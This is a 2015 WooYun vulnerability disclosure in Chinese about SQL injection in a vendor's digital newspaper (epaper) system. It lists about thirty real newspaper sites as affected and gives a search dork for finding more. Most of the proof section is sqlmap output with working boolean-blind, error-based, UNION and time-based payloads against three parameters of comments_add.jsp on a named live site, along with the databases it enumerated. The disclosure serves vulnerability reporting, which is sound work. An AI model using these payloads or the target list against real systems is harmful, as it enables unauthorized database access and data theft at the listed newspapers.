当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118290

漏洞标题:某数字报刊系统通用SQL注入漏洞,影响大量知名报社

相关厂商:北京紫新报通科技发展有限公司

漏洞作者: 路人甲

提交时间:2015-06-05 10:29

修复时间:2015-09-08 08:56

公开时间:2015-09-08 08:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-05: 细节已通知厂商并且等待厂商处理中
2015-06-10: 厂商已经确认,细节仅向厂商公开
2015-06-13: 细节向第三方安全合作伙伴开放
2015-08-04: 细节向核心白帽子及相关领域专家公开
2015-08-14: 细节向普通白帽子公开
2015-08-24: 细节向实习白帽子公开
2015-09-08: 细节向公众公开

简要描述:

某数字报刊系统通用SQL注入漏洞,影响大量知名报社

详细说明:

系统架构:JSP+MYSQL
关键字:inurl:/epaper 北京紫新报通科技发展有限公司

11.png


部分案例:
中国医学论坛报:
http://epaper.cmt.com.cn/epaper/uniflows/html/2015/05/29/K-01/default.htm
增城日报:
http://zcrb.zcwin.com/epaper/
孝感日报:
http://szb.xgrb.cn:9999/epaper/xgwb/html/2015/06/02/01/default.htm
定州日报:
http://szb.dingzhoudaily.com:10000/epaper/paper.jsp?papername=%B6%A8%D6%DD
%C8%D5%B1%A8&pubdate=2014-07-24&pagename=01&pubpath=aper/dzrb/html
中国会计报:
http://www.zgkjb.com.cn/epaper/uniflows/html/2015/03/13/boardpicurl.htm
丹阳日报:
http://dyrb.dy001.cn:9999/epaper/dyrb/html/2015/05/23/02/02_54.html
濮阳日报:
http://www.pyxww.cn:8080/epaper/paper.jsp?papername=
%E5%A7%D1%F4%C8%D5%B1%A8&pubdate=2015-03-05&pagename=01&pubpath=pyrb/html
永新周刊:
http://www.yongxin.gov.cn/epaper/uniflows/20150406/01/01_33.htm
中华工商时报:
http://124.42.72.218/epaper/uniflows/html/2015/05/29/06/default.htm
拉萨晚报:
http://www.lasa-eveningnews.com.cn/epaper/uniflows/html/2015/05/29/02/default.htm
今日龙泉:
http://lqszb.zjol.com.cn/epaper/lq/html/2014/11/17/02/default.htm
淮业日报:
http://www.hbnews.net/epaper/hbrb/html/2014/10/17/1/default.htm
丽水广播电视:
http://xyz.lsol.com.cn/epaper/search/index.jsp
柳州日报:
http://www.lznews.gov.cn:9999/epaper/lzrb/html/2015/06/02/01/default.htm
松阳日报:
http://szb.zgsynews.com/epaper/xsy/html/2015/05/05/1/1_42.htm
南宁日报:
http://nnrb.nnnews.net:9999/epaper/nnrb/html/2013/03/26/00/default.htm
同仁日报:
http://58.42.132.75:8080/epaper/trrb/html/
北海晚报:
http://bhrb.beihai.gov.cn:8080/epaper/bhwb/html/2015/06/01/01/default.htm
粮油市场报:
http://www.grainnews.com.cn:9998/epaper/uniflows/html/2015/04/02/boardpicurl.htm
无锡新周刊:
http://58.214.255.28/epaper/wxxzk/html/2014/12/19/B05/B05_29.htm
丹阳日报:
http://epaper.dydaily.com.cn:9999/epaper/dyrb/html/2015/06/02/01/default.htm
孝感日报:
http://szb.xgrb.cn:9999/epaper/
中国医学论坛报:
http://114.113.148.102/epaper/uniflows/html/2015/04/24/K-02/default.htm
保山日报:
http://www.baoshandaily.com:8080/epaper/search/index.jsp
邵阳日报:
http://epaper.shaoyangnews.net/epaper/syrb/html/2010/01/30/04/04_55.htm
娄底日报:
http://ldrb.xxcmw.com:81/epaper/ldrb/html/2014/12/20/01/01_69.htm
生态新区:
http://61.153.66.148/epaper/search/index.jsp
中国经济导报:
http://www.ceh.com.cn/epaper/uniflows/html/2015/06/02/A01/default.htm
庆元日报:
http://122.224.69.77:9999/epaper/uniflows/html/2013/09/09/01/01_130.htm
河南法制报:
http://219.156.123.48:8080/epaper/uniflows/hnfzb/2015/01/21/11/11_53.htm

漏洞证明:

SQL注入漏洞一:
漏洞文件:epaper/comments/comments_add.jsp
注入参数:papername
http://epaper.cmt.com.cn/epaper/comments/comments_add.jsp?dowhat=addsave为例:

11.png


Place: POST
Parameter: papername
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus
e (RLIKE)
Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8' RLIKE IF(2847=2847,0x2542352541
34254431254634254338254435254231254138,0x28) AND 'SolV'='SolV&pubdate=2015-06-04
&pagename=02&contentid=58&title=%BC%B1%A3%A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%EE
%BD%F6%CD%EA%B3%C9%B6%FE%B3%C9&guestcomments=on&clubuser=long1112&password=00000
0&content=dasdadasdadsadads
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8' AND (SELECT 6014 FROM(SELECT CO
UNT(*),CONCAT(0x3a7077723a,(SELECT (CASE WHEN (6014=6014) THEN 1 ELSE 0 END)),0x
3a716f743a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)
a) AND 'agBy'='agBy&pubdate=2015-06-04&pagename=02&contentid=58&title=%BC%B1%A3%
A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%EE%BD%F6%CD%EA%B3%C9%B6%FE%B3%C9&guestcommen
ts=on&clubuser=long1112&password=000000&content=dasdadasdadsadads
Type: UNION query
Title: MySQL UNION query (NULL) - 16 columns
Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8' UNION ALL SELECT NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a7077723a,0x4650704743526f6f4d42,0
x3a716f743a),NULL,NULL,NULL,NULL,NULL#&pubdate=2015-06-04&pagename=02&contentid=
58&title=%BC%B1%A3%A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%EE%BD%F6%CD%EA%B3%C9%B6%F
E%B3%C9&guestcomments=on&clubuser=long1112&password=000000&content=dasdadasdadsa
dads
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (comment)
Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8' AND SLEEP(5)#&pubdate=2015-06-0
4&pagename=02&contentid=58&title=%BC%B1%A3%A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%E
E%BD%F6%CD%EA%B3%C9%B6%FE%B3%C9&guestcomments=on&clubuser=long1112&password=0000
00&content=dasdadasdadsadads
---


数据库:

11.png


available databases [4]:
[*] epaper
[*] epaper_new
[*] information_schema
[*] mysql


SQL注入漏洞二:
漏洞文件:epaper/comments/comments_add.jsp
注入参数:contentid

Place: POST
Parameter: contentid
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus
e (RLIKE)
Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8&pubdate=2015-06-04&pagename=02&c
ontentid=58' RLIKE IF(5772=5772,58,0x28) AND 'xliE'='xliE&title=%BC%B1%A3%A1%C8%
AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%EE%BD%F6%CD%EA%B3%C9%B6%FE%B3%C9&guestcomments=on&
clubuser=long1112&password=000000&content=dasdadasdadsadads
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8&pubdate=2015-06-04&pagename=02&c
ontentid=58' AND (SELECT 2218 FROM(SELECT COUNT(*),CONCAT(0x3a7077723a,(SELECT (
CASE WHEN (2218=2218) THEN 1 ELSE 0 END)),0x3a716f743a,FLOOR(RAND(0)*2))x FROM I
NFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fzjs'='fzjs&title=%BC%B1%A3%
A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%EE%BD%F6%CD%EA%B3%C9%B6%FE%B3%C9&guestcommen
ts=on&clubuser=long1112&password=000000&content=dasdadasdadsadads
Type: UNION query
Title: MySQL UNION query (NULL) - 16 columns
Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8&pubdate=2015-06-04&pagename=02&c
ontentid=58' UNION ALL SELECT CONCAT(0x3a7077723a,0x4d466954494e534a4345,0x3a716
f743a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
L#&title=%BC%B1%A3%A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%EE%BD%F6%CD%EA%B3%C9%B6%F
E%B3%C9&guestcomments=on&clubuser=long1112&password=000000&content=dasdadasdadsa
dads
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (comment)
Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8&pubdate=2015-06-04&pagename=02&c
ontentid=58' AND SLEEP(5)#&title=%BC%B1%A3%A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%E
E%BD%F6%CD%EA%B3%C9%B6%FE%B3%C9&guestcomments=on&clubuser=long1112&password=0000
00&content=dasdadasdadsadads
---


11.png


SQL注入漏洞二:
漏洞文件:epaper/comments/comments_add.jsp
注入参数:pagename

Place: POST
Parameter: pagename
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus
e (RLIKE)
Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8&pubdate=2015-06-04&pagename=02'
RLIKE IF(1930=1930,02,0x28) AND 'PlQG'='PlQG&contentid=58&title=%BC%B1%A3%A1%C8%
AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%EE%BD%F6%CD%EA%B3%C9%B6%FE%B3%C9&guestcomments=on&
clubuser=long1112&password=000000&content=dasdadasdadsadads
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8&pubdate=2015-06-04&pagename=02'
AND (SELECT 7282 FROM(SELECT COUNT(*),CONCAT(0x3a7077723a,(SELECT (CASE WHEN (72
82=7282) THEN 1 ELSE 0 END)),0x3a716f743a,FLOOR(RAND(0)*2))x FROM INFORMATION_SC
HEMA.CHARACTER_SETS GROUP BY x)a) AND 'luHN'='luHN&contentid=58&title=%BC%B1%A3%
A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%EE%BD%F6%CD%EA%B3%C9%B6%FE%B3%C9&guestcommen
ts=on&clubuser=long1112&password=000000&content=dasdadasdadsadads
Type: UNION query
Title: MySQL UNION query (NULL) - 16 columns
Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8&pubdate=2015-06-04&pagename=02'
UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x3a7077723a,0x52624a57516c6b494e56,
0x3a716f743a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&contentid=
58&title=%BC%B1%A3%A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%EE%BD%F6%CD%EA%B3%C9%B6%F
E%B3%C9&guestcomments=on&clubuser=long1112&password=000000&content=dasdadasdadsa
dads
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (comment)
Payload: papername=%B5%A4%D1%F4%C8%D5%B1%A8&pubdate=2015-06-04&pagename=02'
AND SLEEP(5)#&contentid=58&title=%BC%B1%A3%A1%C8%AB%CA%D0%D0%A1%C2%F3%CA%D5%B8%E
E%BD%F6%CD%EA%B3%C9%B6%FE%B3%C9&guestcomments=on&clubuser=long1112&password=0000
00&content=dasdadasdadsadads
---


root用户:

11.png


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-06-10 08:54

厂商回复:

CNVD确认所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无